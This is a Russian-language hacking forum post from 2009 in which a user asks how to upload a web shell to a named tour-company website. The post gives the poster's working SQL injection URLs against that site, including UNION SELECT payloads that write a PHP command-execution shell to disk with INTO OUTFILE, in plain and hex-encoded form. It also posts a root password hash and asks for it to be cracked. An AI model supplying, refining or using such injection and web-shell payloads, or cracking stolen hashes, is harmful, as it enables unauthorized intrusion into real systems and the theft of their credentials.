Здравствуйте.
1.Подскажите пожалуйста, есть сайт с инъекцией http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,2,3,4,5,6--
Как можно залить шелл?
http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,'<? php system($_GET[cmd]); ?>',3,4,5,6 INTO OUTFILE 'D:/www/shell.php'-- ничего не получается
http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,3,4,5,6 INTO OUTFILE 'D:/www/shell.php' так же них нету
кавычки экранируются. Облом с аутфайлом в общем.
Можешь хеш расшифровать к юзеру рут =)
root:C705FA72189D628A3657C885B0668778976F72E4
Последний раз редактировалось p.r0phe.t; 01.12.2009 в 15:27..